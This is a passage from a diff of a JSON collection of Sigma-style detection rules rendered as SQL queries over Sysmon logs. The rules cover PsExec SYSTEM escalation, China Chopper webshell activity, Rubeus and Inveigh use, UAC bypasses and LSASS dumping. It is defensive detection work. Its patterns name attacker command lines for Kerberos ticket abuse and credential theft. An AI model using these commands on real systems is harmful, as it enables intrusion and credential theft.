'%\\\\System32\\\\dns.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\System32\\\\werfault.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dnscmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_winrar_execution.yml" + "filename": "proc_creation_win_exploit_cve_2020_1350.yml" }, { - "title": "Python Spawning Pretty TTY on Windows", - "id": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", + "title": "Remote CHM File Download/Execution Via HH.EXE", + "id": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", "status": "experimental", - "description": "Detects python spawning a pretty tty", - "author": "Nextron Systems", + "description": "Detects the usage of \"hh.exe\" to execute/download remotely hosted \".chm\" files.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1218.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%python.exe' ESCAPE '\\' OR Image LIKE '%python3.exe' ESCAPE '\\' OR Image LIKE '%python2.exe' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'HH.exe' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_python_pty_spawn.yml" + "filename": "proc_creation_win_hh_chm_remote_download_or_execution.yml" }, { - "title": "Finger.exe Suspicious Invocation", - "id": "af491bca-e752-4b44-9c86-df5680533dbc", + "title": "PsExec/PAExec Escalation to LOCAL SYSTEM", + "id": "8834e2f7-6b4b-4f09-8906-d2276470ee23", "status": "experimental", - "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", - "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", + "description": "Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Admin activity (unclear what they do nowadays with finger.exe)" + "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)", + "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'finger.exe' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND (CommandLine LIKE '%psexec%' ESCAPE '\\' OR CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_finger_usage.yml" + "filename": "proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA", - "id": "ac20ae82-8758-4f38-958e-b44a3140ca88", - "status": "test", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious TSCON Start as SYSTEM", + "id": "9847f263-4a81-424f-970c-875dab15b79b", + "status": "experimental", + "description": "Detects a tscon.exe start as LOCAL SYSTEM", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%mshta%' ESCAPE '\\' AND CommandLine LIKE '%vbscript:createobject%' ESCAPE '\\' AND CommandLine LIKE '%.run%' ESCAPE '\\' AND CommandLine LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND Image LIKE '%\\\\tscon.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_tscon_localsystem.yml" }, { - "title": "Microsoft IIS Connection Strings Decryption", - "id": "97dbf6e2-e436-44d8-abee-4261b24d3e41", - "status": "experimental", - "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", - "author": "Tim Rauch", + "title": "Potential CommandLine Path Traversal Via Cmd.EXE", + "id": "087790e3-3287-436c-bccf-cbd0184a7db1", + "status": "test", + "description": "Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking", + "author": "xknow @xknow_infosec, Tim Shelton", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Unknown" + "Java tools are known to produce false-positive when loading libraries" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\aspnet\\_regiis.exe' ESCAPE '\\' OR OriginalFileName LIKE 'aspnet\\_regiis.exe' ESCAPE '\\') AND (CommandLine LIKE '%connectionStrings%' ESCAPE '\\' AND CommandLine LIKE '% -pdf%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'cmd.exe') AND ((ParentCommandLine LIKE '%/c%' ESCAPE '\\' OR ParentCommandLine LIKE '%/k%' ESCAPE '\\' OR ParentCommandLine LIKE '%/r%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/k%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (ParentCommandLine = '/../../' OR CommandLine LIKE '%/../../%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\Tasktop\\\\keycloak\\\\bin\\\\/../../jre\\\\bin\\\\java%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_iis_connection_strings_decryption.yml" + "filename": "proc_creation_win_cmd_path_traversal.yml" }, { - "title": "APT31 Judgement Panda Activity", - "id": "03e2746e-2b31-42f1-ab7a-eb39365b2422", - "status": "test", - "description": "Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report", - "author": "Florian Roth (Nextron Systems)", + "title": "Chopper Webshell Process Pattern", + "id": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", + "status": "experimental", + "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", + "author": "Florian Roth (Nextron Systems), MSTI (query)", "tags": [ - "attack.lateral_movement", - "attack.credential_access", - "attack.g0128", - "attack.t1003.001", - "attack.t1560.001" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ldifde%' ESCAPE '\\' AND CommandLine LIKE '%-f -n%' ESCAPE '\\' AND CommandLine LIKE '%eprod.ldf%' ESCAPE '\\') OR (CommandLine LIKE '%copy \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%c$%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\aaaa\\\\procdump64.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\aaaa\\\\netsess.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\aaaa\\\\7za.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\aaaa\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\') AND (CommandLine LIKE '%&ipconfig&echo%' ESCAPE '\\' OR CommandLine LIKE '%&quser&echo%' ESCAPE '\\' OR CommandLine LIKE '%&whoami&echo%' ESCAPE '\\' OR CommandLine LIKE '%&c:&echo%' ESCAPE '\\' OR CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%&dir&echo%' ESCAPE '\\' OR CommandLine LIKE '%&echo [E]%' ESCAPE '\\' OR CommandLine LIKE '%&echo [S]%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt31_judgement_panda.yml" + "filename": "proc_creation_win_webshell_chopper.yml" }, { - "title": "CMSTP Execution Process Creation", - "id": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "Reg Add Suspicious Paths", + "id": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", + "status": "experimental", + "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.t1112", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Rare legitimate add to registry via cli (to these locations)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmstp.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmstp_execution_by_creation.yml" + "filename": "proc_creation_win_reg_susp_paths.yml" }, { - "title": "Potential MsiExec Masquerading", - "id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", - "status": "test", - "description": "Detects the execution of msiexec.exe from an uncommon directory", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1036.005" - ], + "title": "Potential Exploitation Attempt Of Undocumented WindowsServer RCE", + "id": "6d5b8176-d87d-4402-8af4-53aee9db7b5d", + "status": "experimental", + "description": "Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND CommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND (User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msiexec_masquerading.yml" + "filename": "proc_creation_win_exploit_other_win_server_undocumented_rce.yml" }, { - "title": "Suspicious DLL Loaded via CertOC.EXE", - "id": "84232095-ecca-4015-b0d7-7726507ee793", + "title": "Suspicious Greedy Compression Using Rar.EXE", + "id": "afe52666-401e-4a02-b4ff-5d128990b8cb", "status": "experimental", - "description": "Detects when a user installs certificates by using CertOC.exe to load the target DLL file.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", + "author": "X__Junior (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Description = 'Command line RAR' OR (CommandLine LIKE '%.exe a %' ESCAPE '\\' OR CommandLine LIKE '% a -m%' ESCAPE '\\')) AND (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% -r %' ESCAPE '\\' AND (CommandLine LIKE '% C:\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\$Recycle.bin\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_certoc_load_dll_susp_locations.yml" + "filename": "proc_creation_win_rar_susp_greedy_compression.yml" }, { - "title": "UAC Bypass Tools Using ComputerDefaults", - "id": "3c05e90d-7eba-4324-9972-5d7f711a60a8", + "title": "UAC Bypass Using Windows Media Player - Process", + "id": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", "status": "test", - "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", @@ -8278,894 +8036,904 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (IntegrityLevel IN ('High', 'System') AND Image LIKE 'C:\\\\Windows\\\\System32\\\\ComputerDefaults.exe' ESCAPE '\\') AND NOT ((ParentImage LIKE '%:\\\\Windows\\\\System32%' ESCAPE '\\' OR ParentImage LIKE '%:\\\\Program Files%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\mmc.exe\" \"C:\\\\Windows\\\\system32\\\\eventvwr.msc\" /s' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))))" ], - "filename": "proc_creation_win_uac_bypass_computerdefaults.yml" + "filename": "proc_creation_win_uac_bypass_wmp.yml" }, { - "title": "HackTool - Rubeus Execution", - "id": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", - "status": "stable", - "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - Inveigh Execution", + "id": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", + "status": "experimental", + "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Very unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Rubeus.exe' ESCAPE '\\' OR OriginalFileName = 'Rubeus.exe' OR Description = 'Rubeus' OR (CommandLine LIKE '% asreproast %' ESCAPE '\\' OR CommandLine LIKE '% dump /service:krbtgt %' ESCAPE '\\' OR CommandLine LIKE '% dump /luid:0x%' ESCAPE '\\' OR CommandLine LIKE '% kerberoast %' ESCAPE '\\' OR CommandLine LIKE '% createnetonly /program:%' ESCAPE '\\' OR CommandLine LIKE '% ptt /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% /impersonateuser:%' ESCAPE '\\' OR CommandLine LIKE '% renew /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% asktgt /user:%' ESCAPE '\\' OR CommandLine LIKE '% harvest /interval:%' ESCAPE '\\' OR CommandLine LIKE '% s4u /user:%' ESCAPE '\\' OR CommandLine LIKE '% s4u /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% hash /password:%' ESCAPE '\\' OR CommandLine LIKE '% golden /aes256:%' ESCAPE '\\' OR CommandLine LIKE '% silver /user:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR (OriginalFileName LIKE '\\\\Inveigh.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\Inveigh.dll' ESCAPE '\\') OR Description = 'Inveigh' OR (CommandLine LIKE '% -SpooferIP%' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToIPs %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToDomains %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToMACs %' ESCAPE '\\' OR CommandLine LIKE '% -SnifferIP%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_rubeus.yml" + "filename": "proc_creation_win_hktl_inveigh.yml" }, { - "title": "Potential Russian APT Credential Theft Activity", - "id": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", - "status": "stable", - "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", + "title": "Renamed AdFind Execution", + "id": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", + "status": "test", + "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%xcopy /S /E /C /Q /H \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%adexplorer -snapshot \"\" c:\\\\users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\downloads\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.snp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\') OR Imphash IN ('bca5675746d13a1f246e2da3c2217492', '53e117a96057eaf19c41380d0e87f1c2') OR (Hashes LIKE '%IMPHASH=BCA5675746D13A1F246E2DA3C2217492%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=53E117A96057EAF19C41380D0E87F1C2%' ESCAPE '\\') OR OriginalFileName = 'AdFind.exe') AND NOT (Image LIKE '%\\\\AdFind.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_bear_activity_gtr19.yml" + "filename": "proc_creation_win_renamed_adfind.yml" }, { - "title": "Findstr LSASS", - "id": "fe63010f-8823-4864-a96b-a7b4a0f7b929", + "title": "Suspicious WERMGR Process Patterns", + "id": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", "status": "experimental", - "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", + "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1552.006" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%lsass%' ESCAPE '\\') OR (CommandLine LIKE '% /i lsass.exe%' ESCAPE '\\' OR CommandLine LIKE '% /i \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe \"lsass%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND (Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_findstr_lsass.yml" + "filename": "proc_creation_win_wermgr_susp_child_process.yml" }, { - "title": "New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE", - "id": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", + "title": "HackTool - CreateMiniDump Execution", + "id": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", "status": "test", - "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", + "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/config%' ESCAPE '\\' AND CommandLine LIKE '%/serverlevelplugindll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\CreateMiniDump.exe' ESCAPE '\\' OR Imphash = '4a07f944a83e8a7c2525efa35dd30e2f' OR Hashes LIKE '%IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" + "filename": "proc_creation_win_hktl_createminidump.yml" }, { - "title": "PowerShell Base64 Encoded FromBase64String Keyword", - "id": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", - "status": "test", - "description": "Detects usage of a base64 encoded \"FromBase64String\" cmdlet 